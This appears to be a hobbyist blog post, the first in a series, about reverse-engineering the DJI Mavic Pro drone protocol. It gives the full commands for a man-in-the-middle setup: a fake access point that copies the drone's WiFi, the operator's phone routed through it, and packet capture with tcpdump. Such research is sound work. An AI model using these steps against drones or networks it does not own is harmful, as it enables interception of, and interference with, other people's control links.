DJI Protocol – Day 1 – Progress Report

The DJI Mavic Pro Drone does support two modes of wireless operation

  • Wifi: 2,4-2,4835GHz; 5,725-5,850 GHz
  • SRRC: 2,4-2,4835 GHz;5,725-5,850 GHz

Since we just get started, we won’t deal with SDRs yet. So we switch the drone into the Wifi operation mode and continue. The idea:

  1. Connect the notebook to the wireless drone network
  2. Create a fake drone AP on the same wireless network card
  3. Connect the drone’s operator phone to the fake AP
  4. Tunnel all packets from AP to the drone
  5. Profit?

Gathering Wifi details

During normal operation, the Drone does expose its SSID Mavic-3be509, but more interesting WPA2 with CCMP cipher. Hence, we will fake our drone AP equal to this configuration.

Faking Drone Network

My network interface equals wlp6s0, gathered from ipconfig.

sudo apt install bash util-linux procps hostapd iproute2 iw wireless-tools haveged iptables dnsmasq git
cd ~/Downloads/
git clone https://github.com/oblique/create_ap.git
cd create_ap
sudo make install
create_ap wlp1s0 wlp1s0 Drone 12345678 -w 2

We connect now a client to our Drone network and receive following output

create_app also takes care of tunneling all the traffic. The default option is -m nat for natting. -w 2 for WPA2

Profit?

We connect the notebook to the Drone, create a AP and connect the phone to the AP; launch the app and see what happens. As it seems the communication works just fine – hence no additional security measurements have been considered for such a MIT attack.

Packet dump

As it went much smoother than expected, we can proceed to dump all network packets onto the FS for further analysis; as one of our goals is to introduce ‘fake’ packets in-between the normal communication flow.

sudo apt update && sudo apt install --assume-yes tcpdump

arp // obtain the operator's IP-Address
sudo tcpdump --interface=ap0 -n host 192.168.12.139 -w ~/Downloads/dumps/drone-idle.pcap

It doesn’t matter whether we listen on wlp6s0 or the AP adapter called ap0, as both shouldn’t receive too much broadcasts. Moreover, we directly filter via the operator’s smartphone’s IP-Address host 192.168.12.139. -n gets rid of DNS resolutions.

Next up: DJI Protocol – Day 2 – Progress Report

0 0 votes
Article Rating
Subscribe
Notify of
1 Comment
Most Voted
Newest Oldest
Inline Feedbacks
View all comments

[…] first impressions while investigating the dump file were quite confusing. Several DNS requests against DJI domains have been sent, which led me to this […]